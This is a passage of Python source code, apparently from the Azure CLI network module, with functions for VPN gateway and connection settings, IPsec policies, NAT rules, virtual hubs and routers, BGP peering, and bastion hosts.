params.radius_server_auth_certificate = radius_server_auth_certificate
params.client_root_certificates = client_root_certificates
return client.begin_generate_vpn_profile(resource_group_name, virtual_network_gateway_name, params)
# legacy implementation
return client.begin_generatevpnclientpackage(resource_group_name, virtual_network_gateway_name, params)
def set_vpn_client_ipsec_policy(cmd, client, resource_group_name, virtual_network_gateway_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
VpnClientIPsecParameters = cmd.get_models('VpnClientIPsecParameters')
vpnclient_ipsec_params = VpnClientIPsecParameters(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
return sdk_no_wait(no_wait, client.begin_set_vpnclient_ipsec_parameters, resource_group_name,
virtual_network_gateway_name, vpnclient_ipsec_params)
def disconnect_vnet_gateway_vpn_connections(cmd, client, resource_group_name, virtual_network_gateway_name,
vpn_connection_ids, no_wait=False):
P2SVpnConnectionRequest = cmd.get_models('P2SVpnConnectionRequest')
request = P2SVpnConnectionRequest(vpn_connection_ids=vpn_connection_ids)
return sdk_no_wait(no_wait, client.begin_disconnect_virtual_network_gateway_vpn_connections,
resource_group_name, virtual_network_gateway_name, request)
# endregion
# region VirtualNetworkGatewayConnections
# pylint: disable=too-many-locals
def create_vpn_connection(cmd, resource_group_name, connection_name, vnet_gateway1,
location=None, tags=None, no_wait=False, validate=False,
vnet_gateway2=None, express_route_circuit2=None, local_gateway2=None,
authorization_key=None, enable_bgp=False, routing_weight=10,
connection_type=None, shared_key=None,
use_policy_based_traffic_selectors=False,
express_route_gateway_bypass=None, ingress_nat_rule=None, egress_nat_rule=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import build_vpn_connection_resource
client = network_client_factory(cmd.cli_ctx).virtual_network_gateway_connections
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
tags = tags or {}
# Build up the ARM template
master_template = ArmTemplateBuilder()
vpn_connection_resource = build_vpn_connection_resource(
cmd, connection_name, location, tags, vnet_gateway1,
vnet_gateway2 or local_gateway2 or express_route_circuit2,
connection_type, authorization_key, enable_bgp, routing_weight, shared_key,
use_policy_based_traffic_selectors, express_route_gateway_bypass, ingress_nat_rule, egress_nat_rule)
master_template.add_resource(vpn_connection_resource)
master_template.add_output('resource', connection_name, output_type='object')
if shared_key:
master_template.add_secure_parameter('sharedKey', shared_key)
if authorization_key:
master_template.add_secure_parameter('authorizationKey', authorization_key)
template = master_template.build()
parameters = master_template.build_parameters()
# deploy ARM template
deployment_name = 'vpn_connection_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def update_vpn_connection(cmd, instance, routing_weight=None, shared_key=None, tags=None,
enable_bgp=None, use_policy_based_traffic_selectors=None,
express_route_gateway_bypass=None):
with cmd.update_context(instance) as c:
c.set_param('routing_weight', routing_weight)
c.set_param('shared_key', shared_key)
c.set_param('tags', tags)
c.set_param('enable_bgp', enable_bgp)
c.set_param('express_route_gateway_bypass', express_route_gateway_bypass)
c.set_param('use_policy_based_traffic_selectors', use_policy_based_traffic_selectors)
# TODO: Remove these when issue #1615 is fixed
gateway1_id = parse_resource_id(instance.virtual_network_gateway1.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway1_id['subscription'])
instance.virtual_network_gateway1 = ncf.virtual_network_gateways.get(
gateway1_id['resource_group'], gateway1_id['name'])
if instance.virtual_network_gateway2:
gateway2_id = parse_resource_id(instance.virtual_network_gateway2.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway2_id['subscription'])
instance.virtual_network_gateway2 = ncf.virtual_network_gateways.get(
gateway2_id['resource_group'], gateway2_id['name'])
if instance.local_network_gateway2:
gateway2_id = parse_resource_id(instance.local_network_gateway2.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway2_id['subscription'])
instance.local_network_gateway2 = ncf.local_network_gateways.get(
gateway2_id['resource_group'], gateway2_id['name'])
return instance
def list_vpn_connections(cmd, resource_group_name, virtual_network_gateway_name=None):
if virtual_network_gateway_name:
client = network_client_factory(cmd.cli_ctx).virtual_network_gateways
return client.list_connections(resource_group_name, virtual_network_gateway_name)
client = network_client_factory(cmd.cli_ctx).virtual_network_gateway_connections
return client.list(resource_group_name)
def start_vpn_conn_package_capture(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
filter_data=None, no_wait=False):
VpnPacketCaptureStartParameters = cmd.get_models('VpnPacketCaptureStartParameters')
parameters = VpnPacketCaptureStartParameters(filter_data=filter_data)
return sdk_no_wait(no_wait, client.begin_start_packet_capture, resource_group_name,
virtual_network_gateway_connection_name, parameters=parameters)
def stop_vpn_conn_package_capture(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
sas_url, no_wait=False):
VpnPacketCaptureStopParameters = cmd.get_models('VpnPacketCaptureStopParameters')
parameters = VpnPacketCaptureStopParameters(sas_url=sas_url)
return sdk_no_wait(no_wait, client.begin_stop_packet_capture, resource_group_name,
virtual_network_gateway_connection_name, parameters=parameters)
def show_vpn_connection_device_config_script(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
vendor, device_family, firmware_version):
VpnDeviceScriptParameters = cmd.get_models('VpnDeviceScriptParameters')
parameters = VpnDeviceScriptParameters(
vendor=vendor,
device_family=device_family,
firmware_version=firmware_version
)
return client.vpn_device_configuration_script(resource_group_name, virtual_network_gateway_connection_name,
parameters=parameters)
# endregion
# region IPSec Policy Commands
def add_vnet_gateway_ipsec_policy(cmd, resource_group_name, gateway_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
IpsecPolicy = cmd.get_models('IpsecPolicy')
new_policy = IpsecPolicy(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
try:
if gateway.vpn_client_configuration.vpn_client_ipsec_policies:
gateway.vpn_client_configuration.vpn_client_ipsec_policies.append(new_policy)
else:
gateway.vpn_client_configuration.vpn_client_ipsec_policies = [new_policy]
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def clear_vnet_gateway_ipsec_policies(cmd, resource_group_name, gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
try:
gateway.vpn_client_configuration.vpn_client_ipsec_policies = None
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
from azure.cli.core.commands import LongRunningOperation
poller = sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
return LongRunningOperation(cmd.cli_ctx)(poller).vpn_client_configuration.vpn_client_ipsec_policies
def list_vnet_gateway_ipsec_policies(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
try:
return ncf.get(resource_group_name, gateway_name).vpn_client_configuration.vpn_client_ipsec_policies
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
def add_vpn_conn_ipsec_policy(cmd, client, resource_group_name, connection_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
IpsecPolicy = cmd.get_models('IpsecPolicy')
new_policy = IpsecPolicy(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
conn = client.get(resource_group_name, connection_name)
if conn.ipsec_policies:
conn.ipsec_policies.append(new_policy)
else:
conn.ipsec_policies = [new_policy]
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
def clear_vpn_conn_ipsec_policies(cmd, client, resource_group_name, connection_name, no_wait=False):
conn = client.get(resource_group_name, connection_name)
conn.ipsec_policies = None
conn.use_policy_based_traffic_selectors = False
if no_wait:
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
from azure.cli.core.commands import LongRunningOperation
poller = sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
return LongRunningOperation(cmd.cli_ctx)(poller).ipsec_policies
def list_vpn_conn_ipsec_policies(cmd, client, resource_group_name, connection_name):
return client.get(resource_group_name, connection_name).ipsec_policies
def assign_vnet_gateway_aad(cmd, resource_group_name, gateway_name,
aad_tenant, aad_audience, aad_issuer, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
gateway.vpn_client_configuration.aad_tenant = aad_tenant
gateway.vpn_client_configuration.aad_audience = aad_audience
gateway.vpn_client_configuration.aad_issuer = aad_issuer
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def show_vnet_gateway_aad(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
return gateway.vpn_client_configuration
def remove_vnet_gateway_aad(cmd, resource_group_name, gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
gateway.vpn_client_configuration.aad_tenant = None
gateway.vpn_client_configuration.aad_audience = None
gateway.vpn_client_configuration.aad_issuer = None
if cmd.supported_api_version(min_api='2020-11-01'):
gateway.vpn_client_configuration.vpn_authentication_types = None
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def add_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name, name, internal_mappings, external_mappings,
rule_type=None, mode=None, ip_config_id=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
VirtualNetworkGatewayNatRule, VpnNatRuleMapping = cmd.get_models('VirtualNetworkGatewayNatRule',
'VpnNatRuleMapping')
gateway.nat_rules.append(
VirtualNetworkGatewayNatRule(type_properties_type=rule_type, mode=mode, name=name,
internal_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in internal_mappings] if internal_mappings else None,
external_mappings=[VpnNatRuleMapping(address_space=e_map) for e_map in external_mappings] if external_mappings else None,
ip_configuration_id=ip_config_id))
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def show_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
return gateway.nat_rules
def remove_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name, name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
for rule in gateway.nat_rules:
if name == rule.name:
gateway.nat_rules.remove(rule)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
raise UnrecognizedArgumentError(f'Do not find nat_rules named {name}!!!')
# endregion
# region VirtualHub
def create_virtual_hub(cmd, client,
resource_group_name,
virtual_hub_name,
hosted_subnet,
public_ip_address=None,
location=None,
tags=None):
from azure.core.exceptions import HttpResponseError
from azure.cli.core.commands import LongRunningOperation
try:
client.get(resource_group_name, virtual_hub_name)
raise CLIError('The VirtualHub "{}" under resource group "{}" exists'.format(
virtual_hub_name, resource_group_name))
except HttpResponseError:
pass
SubResource = cmd.get_models('SubResource')
VirtualHub, HubIpConfiguration = cmd.get_models('VirtualHub', 'HubIpConfiguration')
hub = VirtualHub(tags=tags, location=location,
virtual_wan=None,
sku='Standard')
vhub_poller = client.begin_create_or_update(resource_group_name, virtual_hub_name, hub)
LongRunningOperation(cmd.cli_ctx)(vhub_poller)
ip_config = HubIpConfiguration(
subnet=SubResource(id=hosted_subnet),
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
)
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
try:
vhub_ip_poller = vhub_ip_config_client.begin_create_or_update(
resource_group_name, virtual_hub_name, 'Default', ip_config)
LongRunningOperation(cmd.cli_ctx)(vhub_ip_poller)
except Exception as ex:
logger.error(ex)
try:
vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
except HttpResponseError:
pass
client.begin_delete(resource_group_name, virtual_hub_name)
raise ex
return client.get(resource_group_name, virtual_hub_name)
def virtual_hub_update_setter(client, resource_group_name, virtual_hub_name, parameters):
return client.begin_create_or_update(resource_group_name, virtual_hub_name, parameters)
def update_virtual_hub(cmd, instance,
tags=None,
allow_branch_to_branch_traffic=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
c.set_param('allow_branch_to_branch_traffic', allow_branch_to_branch_traffic)
return instance
def delete_virtual_hub(cmd, client, resource_group_name, virtual_hub_name, no_wait=False):
from azure.cli.core.commands import LongRunningOperation
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
ip_configs = list(vhub_ip_config_client.list(resource_group_name, virtual_hub_name))
if ip_configs:
ip_config = ip_configs[0] # There will always be only 1
poller = vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, ip_config.name)
LongRunningOperation(cmd.cli_ctx)(poller)
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, virtual_hub_name)
def list_virtual_hub(client, resource_group_name=None):
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name)
return client.list()
def create_virtual_hub_bgp_connection(cmd, client, resource_group_name, virtual_hub_name, connection_name,
peer_asn, peer_ip, no_wait=False):
BgpConnection = cmd.get_models('BgpConnection')
vhub_bgp_conn = BgpConnection(name=connection_name, peer_asn=peer_asn, peer_ip=peer_ip)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name,
virtual_hub_name, connection_name, vhub_bgp_conn)
def virtual_hub_bgp_connection_update_setter(client, resource_group_name,
virtual_hub_name, connection_name,
parameters):
return client.begin_create_or_update(resource_group_name, virtual_hub_name, connection_name, parameters)
def update_virtual_hub_bgp_connection(cmd, instance, peer_asn=None, peer_ip=None):
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('peer_ip', peer_ip)
return instance
def delete_virtual_hub_bgp_connection(client, resource_group_name,
virtual_hub_name, connection_name, no_wait=False):
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, virtual_hub_name, connection_name)
def list_virtual_hub_bgp_connection_learned_routes(client, resource_group_name, virtual_hub_name, connection_name):
return client.begin_list_learned_routes(resource_group_name, virtual_hub_name, connection_name)
def list_virtual_hub_bgp_connection_advertised_routes(client, resource_group_name, virtual_hub_name, connection_name):
return client.begin_list_advertised_routes(resource_group_name, virtual_hub_name, connection_name)
# endregion
# region VirtualRouter
def create_virtual_router(cmd,
resource_group_name,
virtual_router_name,
hosted_gateway=None,
hosted_subnet=None,
location=None,
tags=None):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
from azure.core.exceptions import HttpResponseError
try:
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
virtual_hub_name = virtual_router_name
try:
vhub_client.get(resource_group_name, virtual_hub_name)
raise CLIError('The VirtualRouter "{}" under resource group "{}" exists'.format(virtual_hub_name,
resource_group_name))
except HttpResponseError:
pass
SubResource = cmd.get_models('SubResource')
# for old VirtualRouter
if hosted_gateway is not None:
VirtualRouter = cmd.get_models('VirtualRouter')
virtual_router = VirtualRouter(virtual_router_asn=None,
virtual_router_ips=[],
hosted_subnet=None,
hosted_gateway=SubResource(id=hosted_gateway),
location=location,
tags=tags)
return vrouter_client.begin_create_or_update(resource_group_name, virtual_router_name, virtual_router)
# for VirtualHub
VirtualHub, HubIpConfiguration = cmd.get_models('VirtualHub', 'HubIpConfiguration')
hub = VirtualHub(tags=tags, location=location, virtual_wan=None, sku='Standard')
ip_config = HubIpConfiguration(subnet=SubResource(id=hosted_subnet))
from azure.cli.core.commands import LongRunningOperation
vhub_poller = vhub_client.begin_create_or_update(resource_group_name, virtual_hub_name, hub)
LongRunningOperation(cmd.cli_ctx)(vhub_poller)
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
try:
vhub_ip_poller = vhub_ip_config_client.begin_create_or_update(resource_group_name,
virtual_hub_name,
'Default',
ip_config)
LongRunningOperation(cmd.cli_ctx)(vhub_ip_poller)
except Exception as ex:
logger.error(ex)
vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
vhub_client.begin_delete(resource_group_name, virtual_hub_name)
raise ex
return vhub_client.get(resource_group_name, virtual_hub_name)
def virtual_router_update_getter(cmd, resource_group_name, virtual_router_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
return vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError: # 404
pass
virtual_hub_name = virtual_router_name
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
return vhub_client.get(resource_group_name, virtual_hub_name)
def virtual_router_update_setter(cmd, resource_group_name, virtual_router_name, parameters):
if parameters.type == 'Microsoft.Network/virtualHubs':
client = network_client_factory(cmd.cli_ctx).virtual_hubs
else:
client = network_client_factory(cmd.cli_ctx).virtual_routers
# If the client is virtual_hubs,
# the virtual_router_name represents virtual_hub_name and
# the parameters represents VirtualHub
return client.begin_create_or_update(resource_group_name, virtual_router_name, parameters)
def update_virtual_router(cmd, instance, tags=None):
# both VirtualHub and VirtualRouter own those properties
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
return instance
def list_virtual_router(cmd, resource_group_name=None):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
if resource_group_name is not None:
vrouters = vrouter_client.list_by_resource_group(resource_group_name)
vhubs = vhub_client.list_by_resource_group(resource_group_name)
else:
vrouters = vrouter_client.list()
vhubs = vhub_client.list()
return list(vrouters) + list(vhubs)
def show_virtual_router(cmd, resource_group_name, virtual_router_name):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
from azure.core.exceptions import HttpResponseError
try:
item = vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
virtual_hub_name = virtual_router_name
item = vhub_client.get(resource_group_name, virtual_hub_name)
return item
def delete_virtual_router(cmd, resource_group_name, virtual_router_name):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
from azure.core.exceptions import HttpResponseError
try:
vrouter_client.get(resource_group_name, virtual_router_name)
item = vrouter_client.begin_delete(resource_group_name, virtual_router_name)
except HttpResponseError:
from azure.cli.core.commands import LongRunningOperation
virtual_hub_name = virtual_router_name
poller = vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
LongRunningOperation(cmd.cli_ctx)(poller)
item = vhub_client.begin_delete(resource_group_name, virtual_hub_name)
return item
def create_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name, peer_asn, peer_ip):
# try VirtualRouter first
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
VirtualRouterPeering = cmd.get_models('VirtualRouterPeering')
virtual_router_peering = VirtualRouterPeering(peer_asn=peer_asn, peer_ip=peer_ip)
return vrouter_peering_client.begin_create_or_update(resource_group_name,
virtual_router_name,
peering_name,
virtual_router_peering)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# try VirtualHub then if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
BgpConnection = cmd.get_models('BgpConnection')
vhub_bgp_conn = BgpConnection(name=peering_name, peer_asn=peer_asn, peer_ip=peer_ip)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.begin_create_or_update(resource_group_name, virtual_hub_name,
bgp_conn_name, vhub_bgp_conn)
def virtual_router_peering_update_getter(cmd, resource_group_name, virtual_router_name, peering_name):
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
from azure.core.exceptions import HttpResponseError
try:
return vrouter_peering_client.get(resource_group_name, virtual_router_name, peering_name)
except HttpResponseError: # 404
pass
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.get(resource_group_name, virtual_hub_name, bgp_conn_name)
def virtual_router_peering_update_setter(cmd, resource_group_name, virtual_router_name, peering_name, parameters):
if parameters.type == 'Microsoft.Network/virtualHubs/bgpConnections':
client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
else:
client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
# if the client is virtual_hub_bgp_connection,
# the virtual_router_name represents virtual_hub_name and
# the peering_name represents bgp_connection_name and
# the parameters represents BgpConnection
return client.begin_create_or_update(resource_group_name, virtual_router_name, peering_name, parameters)
def update_virtual_router_peering(cmd, instance, peer_asn=None, peer_ip=None):
# both VirtualHub and VirtualRouter own those properties
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('peer_ip', peer_ip)
return instance
def list_virtual_router_peering(cmd, resource_group_name, virtual_router_name):
virtual_hub_name = virtual_router_name
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
try:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
vrouter_peerings = list(vrouter_peering_client.list(resource_group_name, virtual_router_name))
except HttpResponseError:
vrouter_peerings = []
virtual_hub_name = virtual_router_name
try:
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connections
vhub_bgp_connections = list(vhub_bgp_conn_client.list(resource_group_name, virtual_hub_name))
except HttpResponseError:
vhub_bgp_connections = []
return list(vrouter_peerings) + list(vhub_bgp_connections)
def show_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
return vrouter_peering_client.get(resource_group_name, virtual_router_name, peering_name)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# try VirtualHub then if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.get(resource_group_name, virtual_hub_name, bgp_conn_name)
def delete_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except: # pylint: disable=bare-except
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
return vrouter_peering_client.begin_delete(resource_group_name, virtual_router_name, peering_name)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# try VirtualHub then if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.begin_delete(resource_group_name, virtual_hub_name, bgp_conn_name)
# endregion
# region service aliases
def list_service_aliases(cmd, location, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).available_service_aliases
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name, location=location)
return client.list(location=location)
# endregion
# region bastion
def create_bastion_host(cmd, resource_group_name, bastion_host_name, virtual_network_name,
public_ip_address, location=None, subnet='AzureBastionSubnet', scale_units=None, sku=None, tags=None):
client = network_client_factory(cmd.cli_ctx).bastion_hosts
(BastionHost,
BastionHostIPConfiguration,
SubResource) = cmd.get_models('BastionHost',
'BastionHostIPConfiguration',
'SubResource')
ip_config_name = "bastion_ip_config"
ip_configuration = BastionHostIPConfiguration(name=ip_config_name,
subnet=SubResource(id=subnet),
public_ip_address=SubResource(id=public_ip_address))
bastion_host = BastionHost(ip_configurations=[ip_configuration],
location=location,
tags=tags)
if cmd.supported_api_version(min_api='2021-03-01'):
sku_type = cmd.get_models('Sku')
sku = sku_type(name=sku)
bastion_host = BastionHost(ip_configurations=[ip_configuration],
location=location,
scale_units=scale_units,
sku=sku,
tags=tags)
return client.begin_create_or_update(resource_group_name=resource_group_name,
bastion_host_name=bastion_host_name,
parameters=bastion_host)
def list_bastion_host(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).bastion_hosts
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
SSH_EXTENSION_NAME = 'ssh'
SSH_EXTENSION_MODULE = 'azext_ssh.custom'
SSH_UTILS_EXTENSION_MODULE = 'azext_ssh.ssh_utils'
SSH_EXTENSION_VERSION = '0.1.3'
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _test_extension(extension_name):
from azure.cli.core.extension import (get_extension)
from pkg_resources import parse_version
ext = get_extension(extension_name)
if parse_version(ext.version) < parse_version(SSH_EXTENSION_VERSION):
raise CLIError('SSH Extension (version >= "{}") must be installed'.format(SSH_EXTENSION_VERSION))
def _get_ssh_path(ssh_command="ssh"):
import os
ssh_path = ssh_command
if platform.system() == 'Windows':
arch_data = platform.architecture()
is_32bit = arch_data[0] == '32bit'
sys_path = 'SysNative' if is_32bit else 'System32'
system_root = os.environ['SystemRoot']
system32_path = os.path.join(system_root, sys_path)
ssh_path = os.path.join(system32_path, "openSSH", (ssh_command + ".exe"))
logger.debug("Platform architecture: %s", str(arch_data))
logger.debug("System Root: %s", system_root)
logger.debug("Attempting to run ssh from path %s", ssh_path)
if not os.path.isfile(ssh_path):
raise CLIError("Could not find " + ssh_command + ".exe. Is the OpenSSH client installed?")
else:
raise UnrecognizedArgumentError("Platform is not supported for this command. Supported platforms: Windows")
return ssh_path
def _get_rdp_path(rdp_command="mstsc"):
import os
rdp_path = rdp_command
if platform.system() == 'Windows':
arch_data = platform.architecture()
sys_path = 'System32'
